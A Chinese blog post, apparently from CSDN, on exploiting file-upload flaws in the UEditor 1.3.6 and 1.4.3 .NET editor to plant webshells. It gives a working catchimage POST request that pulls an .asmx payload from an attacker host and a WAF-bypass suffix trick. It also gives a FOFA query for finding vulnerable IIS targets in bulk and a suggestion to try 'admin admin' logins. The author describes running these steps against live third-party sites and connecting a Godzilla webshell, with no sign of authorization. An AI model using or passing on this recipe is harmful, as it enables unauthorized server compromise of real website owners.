原创 | ueditor1.4.3-asmx绕过waf

最新推荐文章于 2024-09-05 23:23:42 发布
最新推荐文章于 2024-09-05 23:23:42 发布
阅读量2.2k 收藏 2
点赞数 2
分类专栏: 实战 web 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29437513/article/details/125966248
版权
web 同时被 2 个专栏收录
37 篇文章 22 订阅
订阅专栏
实战
27 篇文章 13 订阅
订阅专栏

前言: 这段时间老是碰到ueditor,前段时间hvv有红队也通过这拿到shell,谈下编辑器的上传

昨天晚上,群里有个哥们发了个ueditor的编辑器上传,总之他绕过了图片限制,ueditor的解析url是ip的格式,,但传webshell老是403,我也摸了下,,总结了一些原因

如果ueditor上传目录能解析脚本,只是单纯waf拦截的话:

bypass: poc:jpg?.a?s?m?x

解析1

先来说说ueditor1.4.3这编辑器的漏洞,18年出的net格式的上传,可上传绕过的版本有
ueditor/ 1.4.3 net
ueditor/ 1.3.6 net(实际测试不行)
ueditor/ 1.3.6 php

1.3.6环境绕过:
解析漏洞
ueditor 1.3.6 X-Powered-By: ThinkPHP + apache(换行解析和后缀名解析)

以上环境本地均能绕过文件上传

0x00 1.3.6的上传

上传文件Uploader.class.php 192行,文件后缀由$fileName = f o r m a t . format. format.ext; 控制,
226行,$ext不可控

private function getFileExt()
{
    return strtolower( strrchr( $this->file[ "name" ] , '.' ) );
}

文件命名

但1.3.6文件命名引入了format这个函数
而在imageUp.php里30-35行定义了format函数是直接post传参,这处可控,

直接post

实际演示poc:
给format传入参数,配合apache解析漏洞,比如传入1,可以自定义文件头

上传

0x02. 1.4.3net版本文件上传

这版本在hvv经常遇到,但实际利用起来很鸡肋,,
1.上传接口要能访问,不被策略拦截,
2.上传是否能绕过image,
3.上传目录脚本解析策略((2022年大部分ueditor都做了策略))

挖了大概有10来个ueditor站,大部分均存在服务器脚本解析。

案例1: 帮群友看的站

上传aspx成功,但访问403,上传有缺陷的aspx代码,报错但返回200

200

不知道什么原因,觉得可能是黑名单的问题,测试了ashx、asmx等都存在该问题,觉得不是服务器正则

google被动收集找了个ueditor,指纹(iis7.5 asp.net)的站点测试,发现是上传目录禁止执行脚本文件

403

=========================================
2022年了,google的被动信息收集真鸡肋,大部分都只能作为探测敏感信息的入口了,
google测了5-6个站,大部分站收录的结果都玩不了,,还是转向fofa的主动收集,
某指纹: app=“百度-UEditor” && server=“Microsoft-IIS/7.5”
结果还不错,测试了一波后,

结果

反手 admin admin
收录的结果在二级目录都存在ueditor编辑器的目录

套上ueditor文件上传poc

POST /resources/htmleditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1
Host: rhost:rport
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

source%5B%5D=http://ip:port/asmxx.jpg?.asmx

这里贴上tool绕过waf的poc:jpg?.a?s?m?x

jieix

看到上传成功,还是回到刚那个话题: 上传目录是否能解析脚本?
asmx是asp.net通过SOAP协议生成发送消息的功能。大概率能绕过正则,

正常解析

哥斯拉

总结:

1.ueditor 1.4.3文件上传主站通常难绕过上传,403,出洞的大多数在C段,
2.测绘批量收集ueditor的资产,

ECHO::
关注
专栏目录
UEditor漏洞
2ed
07-29 1万+
UEditor是由百度开发的开源富文本编辑器,开源基于BSD协议,小巧灵活,使用简单,有很多web程序在使用UEditor编辑器。该任意文件上传漏洞存在于1.4.3.3和1.5.0版本中,并且只有.NET版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器
UEDITOR1.4.3.3整合教程
alisky119的博客
08-01 948
整合效果:粘贴Word或者WPS文档内容效果:批量粘贴效果:自动替换编辑器中的图片地址:在上传多张图片时非常方便,也非常高效。图片保存路径:相关问题:整合后无法粘帖图片WordPaster2-订阅版-2024.pdfWordPaster2-政企版-2024.pdfWordPaster2-年费版-2024.pdfWordPaster2-OEM版-2024.pdfWordPaster2-源码版-2024.pdf。
推荐文章:探索高效内容创作——百度富文本编辑器UEditor 1.4.3
最新发布
gitblog_09737的博客
09-05 424
推荐文章:探索高效内容创作——百度富文本编辑器UEditor 1.4.3 ueditorbjq.rar项目地址:https://gitcode.com/open-source-toolkit/b08b7 在数字化时代,内容创作变得日益重要,而一款好的富文本编辑器是每个网站开发者和内容创作者不可或缺的工具。今天,我们向大家隆重推荐百度的开源作品——百度富文本编辑器UEditor 1.4.3版本,...
实战纪实 | 编辑器漏洞Ueditor-任意文件上传漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 1万+
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
ueditor java_编辑器ueditor1.4.3 JAVA环境使用
weixin_29435115的博客
02-20 201
修改ueditor.config.js//项目名称/ueditor存放的目录 当前项目Test ueditor目录 WebRoot/plugins/ueditorwindow.UEDITOR_HOME_URL = "/Test/plugins/ueditor";var URL = window.UEDITOR_HOME_URL || getUEBasePath();window.UEDITOR_C...
ueditor1.4.3使用
baidu_35776955的博客
03-02 669
首先不得不吐槽下百度开发团队,下载的这个ueditor放到项目中是不能直接拿来用的各种问题。以下根据自己实际使用给出问题和解决方式: 1)单图上传卡顿问题   针对这个问题,网上有大神给出合理的解决方案,编辑器默认支持所有图片类型导致插件加载缓慢,因此只需要更改为自己需要的图片类型,ueditor/ueditor.all.min.js  修改accept="image/jpg,image/jp
百度ueditor 1.4.3版
03-21
【百度UEditor 1.4.3版】是一款由百度公司开发的富文本编辑器,主要应用于网页内容的编辑和创建。此版本主要是为了解决百度可能会进行的更新升级,导致原有使用的jar包消失的问题,从而提供了一份可靠的备份。通过...
百度富文本编辑器UEditor 1.4.3版本
07-20
百度富文本编辑器UEditor是一款由百度公司开发的开源富文本编辑器,它在1.4.3版本中提供了丰富的功能和优秀的用户体验,适用于网页内容编辑、论坛发帖、博客写作等多种场景。UEditor以其易用性、稳定性和可定制性...
ueditor1.4.3jsp utf-8版配置使用教程
01-13
ueditor1.4.3 jsp utf-8 版配置使用教程】 百度UEditor是一款功能强大的在线富文本编辑器,适用于网页端内容编辑。它提供了丰富的文本格式化选项,图片上传,视频插入等功能,极大地简化了用户在网页上进行文字...
qiniu_ueditor_1.4.3-master.zip
04-21
该插件"qiniu_ueditor_1.4.3-master.zip"是UEditor的一个特定版本,即1.4.3版本的源码包。它包含了完整的UEditor编辑器代码,以及与七牛云服务集成的相关配置和组件。七牛云是一家专注于云端存储和CDN服务的公司,其...
ueditor-1.4.3.3 utf8-net
09-04
最新版本百度编辑器 ueditor-1.4.3.3 utf8-net,完整demo及源码
ueditor1.4.3.zip
08-05
UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。
ueditor-1.4.3.3-完整版+PHP版本.zip
03-02
ueditor-1.4.3.3-完整版+PHP版本
ueditor1.4.3 修改版
03-12
ueditor1.4.3 修改版。 ueditor1.4.3版本中,上传文件和图片 都只能在项目的根目录,我修改了源码,可以随意上传服务器中,只要修改ueditor 1.4.3工具中的 jsp/control.jsp文件的saveRootPath值 ueditor jar
ueditor_1.4.3.3 完整源码
08-16
UEditor 是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。
Ueditor1.4.3百度编辑器配置(包括上传图片)的使用心得
热门推荐
qq_22256607的博客
05-18 3万+
第一次使用Ueditor,遇到很多问题,我使用的是开发版Ueditor1.4.3jsp的UTF-8版本的,java框架是spring MVC (一) 1)首先第一步去到http://ueditor.baidu.com/website/download.html下载并解压 2)在eclipse中新建一个项目,将Ueditor文件复制到webapp文件夹下:
[应用漏洞]UEditor .NET版本任意文件上传漏洞
不忘初心,护天下安全!
07-23 1633
一、UEditor
百度编辑器Ueditor1.4.3的使用
RJSong
01-10 3283
1、首先第一步去到http://ueditor.baidu.com/website/download.html下载并解压 [1.4.3.3 Jsp 版本] UTF-8版 GBK版  2、创建一个项目工程,在jsp文件中引入Ueditor相关的js文件 3、在ueditor文件夹下配置config.json文件,其中百度编辑器主要的配置项是 UrlPrefix 和 Path
Ueditor1.4.3.jsp部署教程:解决MyEclipse下bug
"ueditor1.4.3 jsp项目的部署和修复官方文档未涵盖的错误" 这篇资源主要讲解了如何在JSP环境下部署和配置Ueditor 1.4.3版本,这是一个流行的富文本编辑器。由于ueditor官方网站对JSP版本的文档支持不充分,作者分享...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ECHO::

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值